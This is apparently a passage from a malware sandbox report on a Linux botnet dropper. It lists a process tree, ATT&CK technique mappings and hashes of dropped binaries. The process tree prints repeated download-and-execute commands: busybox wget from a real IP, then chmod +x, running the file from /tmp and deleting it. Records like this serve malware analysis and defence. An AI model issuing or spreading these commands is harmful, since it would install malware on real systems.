  PID:1050
- /bin/chmod
  chmod +x m.-..-6-.-8k
  2⤵
  - File and Directory Permissions Modification
  PID:1051
- /tmp/m.-..-6-.-8k
  ./m.-..-6-.-8k
  2⤵
  - Executes dropped EXE
  PID:1052
- /bin/rm
  rm -rf m.-..-6-.-8k
  2⤵
  PID:1054
- /bin/busybox
  busybox wget -O s-.-pa.-rc http://93.123.85.60/s-.-pa.-rc
  2⤵
  - Writes file to tmp directory
  PID:1055
- /bin/chmod
  chmod +x s-.-pa.-rc
  2⤵
  - File and Directory Permissions Modification
  PID:1056
- /tmp/s-.-pa.-rc
  ./s-.-pa.-rc
  2⤵
  - Executes dropped EXE
  PID:1057
- /bin/rm
  rm -rf s-.-pa.-rc
  2⤵
  PID:1059
- /bin/busybox
  busybox wget -O a-.-r.-m.-4 http://93.123.85.60/a-.-r.-m.-4
  2⤵
  - Writes file to tmp directory
  PID:1060
- /bin/chmod
  chmod +x a-.-r.-m.-4
  2⤵
  - File and Directory Permissions Modification
  PID:1061
- /tmp/a-.-r.-m.-4
  ./a-.-r.-m.-4
  2⤵
  - Executes dropped EXE
  PID:1062
- /bin/rm
  rm -rf a-.-r.-m.-4
  2⤵
  PID:1064
- /bin/busybox
  busybox wget -O a.-.--.r.--m-.--5 http://93.123.85.60/a.-.--.r.--m-.--5
  2⤵
  - Writes file to tmp directory
  PID:1065
- /bin/chmod
  chmod +x a.-.--.r.--m-.--5
  2⤵
  - File and Directory Permissions Modification
  PID:1066
- /tmp/a.-.--.r
  ./a.-.--.r
  2⤵
  PID:1067

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/a-.-r.-m.-4

Filesize
132KB

MD5
87074be3414c135350ff3d3a80bbbe5a

SHA1
475a34a061d4f691ed92ce3922768e907c1bb0b0

SHA256
ca364ea893a8309fff313e1558a72af69e5f18f504b24785abf83d524abe5d2f

SHA512
88950226dd3c10dc56f3c1fac23ed7066cd734c569402a25b5b08a62797d2ecd9cfe7f12ee0db5e7eb3cc75bab6aa227d19651d70d666d374c418d6defaeb813

Download Submit
/tmp/a.-.--.r.--m-.--5

Filesize
172KB

MD5
dfcb7b0e806a0469543742ccfa3d49cf

SHA1
adce59a33be26a600906ceab364af45d16627806

SHA256
febfb27dda2dd2ef5bff942591e4217988c7ff387a11b7490119eb230b4cdbe9

SHA512
86bc249178ed959166d85b2313fadc2a4c4d6de1b29c3ff7f1e568fb77a8cf9825855a571988a923bfa6d4d57353a4decfd7602957065beda6c86cbfdca7684b

Download Submit
/tmp/a.-r.-m6

Filesize
172KB

MD5
e346eb40056eb3c499f2437f8a85d278

SHA1
3c76ff0831acc148ab8443bffd659d4b3a80b8c0

SHA256
ed6d520707ff72175f5e44b96e78de20e8db2786cd4c16d686b4fb2aad7c9399

SHA512
2282c2697fda354deabcd5ebed428e969d50e814d7f8981343b76f9481daa5c3a2244e1f1731973d76c87953dbd7028776dcf32f96535c3997f60f4d50f04eea

Download Submit
/tmp/a.r.-.m7

Filesize
172KB

MD5
775b6ccf9472e033fe84591aa0c21db2

SHA1
0d7c2769b792919327181eeb7feb6a656937c4fb

SHA256
ac1bf270cdb899b3dcd0a908d88dfb43547af9b0a6e7449ae84682eb5b5bc8a8

SHA512
c795cdc93d478f4212e1ac85d01b732da1fd8665f2f4dc65af0b97c07cc3dba94b3b492261a4c21c3051c7fd9bfc51a47ea587839e631404f77e56df7d7fd776

Download Submit
/tmp/i--6.-.86

Filesize
104KB

MD5
4458a4194113d28ee91f9f3c3f208953

SHA1
0c361b2f3ce4d54a63a0196c784dc08f13bdfb67

SHA256
9a2e74f26d7ac21d67da82abc9110f6d495b51dbf1fa955aa797a8be958be177

SHA512
fa5a71da90f5b3fbbb865d1251b98884e7320d23afd078281af0736ba111914b1ca35c3dd027826bec2fc95f84938d28dba171f11a1563faf88f636509e8aa16

Download Submit
/tmp/i5.-.8..-6

Filesize
103KB

MD5
958f16f0e3c8147cfba3bb9e4ec3b6be

SHA1
fbd056714dd714b5483a4d1f060acd0310b7c01b

SHA256
4c6d9c9f565b84aff8c92e7defd56371af130c78751adf30cf951f2f6caefc04

SHA512
2372e48ddb1a250416c26f0e943f9cf7ab20b2e781c92a6d81beeb29acd6caab51592cd2b268c6e95678c6e88b499eac141bf868709f3f3233b2144d83b38e25

Download Submit
/tmp/m-.ips

Filesize
173KB

MD5
0f6aed653ea1b2ddf6c62e0d63b9942e

SHA1
8e3e0d4adf81c2504724f18cb54ebc50b8a5219e

SHA256
1b2dcd476d1f2fb510c5ef30f49a680c538ed22a51e066bf81e0201f12d8a6ea

SHA512
6c928b63a9d3ffd3863396bc11c30052e69ece6d1510f9b7ce9e496ca283a36f61d3b92423ef856ad12981021995ddef49e76aa42afe690fa83629fa8e64c1f1

Download Submit
/tmp/m-i.p.-se.l

Filesize
173KB

MD5
e342e6e55fc96346dbf8048bc23be7a2

SHA1
83ecbffacd473393a322380adbc55760b2130bf8

SHA256
1fb9578c41203a3be431f1873875141f0efed6099077f9fd0dc3544b4d21bd74

SHA512
0d088cbec9fa94d424d33d10d9ec82ce8a1d37c2f9eabb0346adc979cb55a1c7b6901867665cbc2364a3cf55f0524c7c91f0b590c724d9e60dea5cf73fb1a2df

Download Submit
/tmp/m.-..-6-.-8k

Filesize
126KB

MD5
2f44adafa80353c8f38cfb6ea4c9e9e1

SHA1
9d35afdb712159b72422dff2759fbb31cdcf3f99

SHA256
6e09f440921f3e370237d543e4066059de6a5fcb009ed0f62ce0e7f02b0e083e

SHA512
427f8d3111e7bcbbcf49b5adb9ba461e196a972c46f38d68424460561a15488f32e7a96a922ec758ef2ab0279409dc870efaa242412dc747204ddddccc058460

Download Submit
/tmp/p--.-pc

Filesize
125KB

MD5
b51e28507453347746992f1012f7badb

SHA1
eab6451ce15aa815a67c648bc9baa109d06d31c4

SHA256
e3e24ba00bfdc85212de8555b7f7a2aad79b1a7f89dc24b9f1153ebc2805a3b6

SHA512
cb84d46bbbb2f8bab4c543851f9b4cdc6e9abc6bdba999b49ae5e0479e10b77f1379d8f719aa43cf4d4d259c68f9e8823ddc2c5ab84cc6f1ac407b0924edd72b

Download Submit
/tmp/p-.-.p.-.c

Filesize
208B

MD5
a7ca1278c23ad0afd81c74cd6fe42282

SHA1
62735e99907c66c544538f2c1b7d8b51a0f405ae

SHA256
e3671fd945a1abbcfc3675aa47a5729d98e8cb452628dfa5bded3cfa378ed2dd

SHA512
3403b6a21253ba88c3744b4736621d42302c94963e0a8c76a535fd710ed6c1453ff032286933aecb3841a7e18078ccb56ffb16ebafacf0046a631f14635ddc42

Download Submit
/tmp/s-.-pa.-rc

Filesize
143KB

MD5
a12ff26787845727f01fff50500fcd76

SHA1
86a910cdf5683f4cbbbcc357c7fab6872775fc67

SHA256
3dccf92e5113cf4cd1422943583406e5b6f7c2cf7207ebe6f4a60fbddc58e8ab

SHA512
0739fc3a2a31e752e1836b4b95682ed72967a983cc986ead9427ca3c3a8dda525b6b0c0047190a89617626a2db80cc2f9ff6525ef976b5897927609c02bc43c2

Download Submit
/tmp/s-..-h-.4

Filesize
119KB

MD5
c63009396462fb713ccbdc1917a1bcde

SHA1
40a39ce6fb7ef7f845d02b747e06cccc0627522d

SHA256
386ecb26e8582f49fb4ee73cdf1201ba7e9aa24f327ccdf18c56eb3a40fa09c0

SHA512
a62e29e238df261fdcabed974841a142ffb5ad7c3845cc6c7af0b8e2c828e31f3e059d401cca667c0784524b7a9e3e325be6af79693d0abd2da17f3b91e6a6b4

Download Submit
/tmp/x.8-.-6.-

Filesize
124KB

MD5
529714109cae9394a028d64b0f4575d1

SHA1
69cf98d8598b6dfaac2d45ef61251db49de80db2

SHA256
e9d283427fe848cc83fbb538fdfcd06f4f92c2f566fc21cf1158ef0a36c56fa4

SHA512
1b808c98534c1c29a5f71761ea1de2299d9fe1c32cf24838ee406354e2e7d68ca8ac1e8c480009c97c41ecff5028fbbdede85a80b21135d888f1d8474224cf6d

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads